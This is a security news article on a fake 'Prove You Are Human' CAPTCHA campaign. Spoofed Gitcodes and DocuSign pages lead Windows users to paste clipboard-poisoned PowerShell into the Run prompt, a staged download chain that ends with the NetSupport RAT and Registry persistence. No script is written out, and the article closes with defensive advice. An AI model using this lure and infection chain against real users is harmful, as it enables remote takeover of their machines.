Threat actors are exploiting “Prove You Are Human” CAPTCHA systems to distribute various types of malicious software to unsuspecting users. This recently identified campaign leverages spoofed websites that convincingly mimic legitimate platforms like Gitcodes and also popular DocuSign services. These deceptive sites are specifically designed to trick users into executing harmful PowerShell scripts directly on their vulnerable Windows computer systems. The multi-stage attack ultimately installs the NetSupport Remote Access Trojan, a tool frequently abused by cybercriminals for unauthorized system access and control. The attack often begins with users being lured to fraudulent websites presenting seemingly innocuous CAPTCHA-like challenges that require script execution.
These CAPTCHA challenges typically prompt users to copy a provided script and then paste it into the Windows Run prompt for execution.
This initial script, which is often hosted on platforms such as Gitcodes, primarily acts as a downloader for subsequent malicious stages. It then fetches other scripts from various attacker-controlled domains like tradingviewtool[.]com, thereby initiating a more complex infection chain on the system. Through a carefully orchestrated series of web requests, the cyberattack progresses through multiple distinct stages, each script downloading the next component. This sophisticated process then culminates in the full deployment of the NetSupport RAT, establishing a persistent backdoor for the attackers. Persistence is commonly achieved by embedding the malware into the Windows Registry’s Run key or the user’s Startup folder for stealth.
In the DocuSign spoofing variant of this particular attack, cybercriminals employ clever clipboard poisoning techniques against their specifically targeted victims. A ROT13-encoded script is automatically copied to the victim’s clipboard upon their direct interaction with a specially designed fake CAPTCHA checkbox. Users are then explicitly instructed by the fake page to paste and run this script using Win+R commands on their machines. This critical action then triggers the download of additional harmful payloads, such as wbdims.exe from GitHub or jp2launcher.exe from zipped archives. These downloaded scripts subsequently communicate with command-and-control servers, facilitating further malicious downloads and also browser page refreshes to deepen the infection. This intricate, multi-layered approach effectively aims to evade detection by breaking the entire attack into smaller, less conspicuous operational steps.
While the precise attribution for this ongoing campaign currently remains unclear, certain observed patterns in domain registration and payload reuse suggest potential overlaps. These overlaps could be with well-known threat groups like SocGholish or other cybercriminal actors such as FIN7 and also STORM-0408. The core sophistication of this particular campaign lies in its exploitation of user trust in familiar online verification interactions by attackers. Cybersecurity experts strongly urge extreme vigilance because legitimate websites very rarely demand any form of direct script execution from their users. Verifying website URLs, carefully checking SSL certificates, and completely avoiding unverified clipboard content are critical steps to mitigate this growing online threat. This underscores the continuous urgent need for comprehensive user education in an ever-evolving landscape of dangerous social engineering attacks.
Reference:
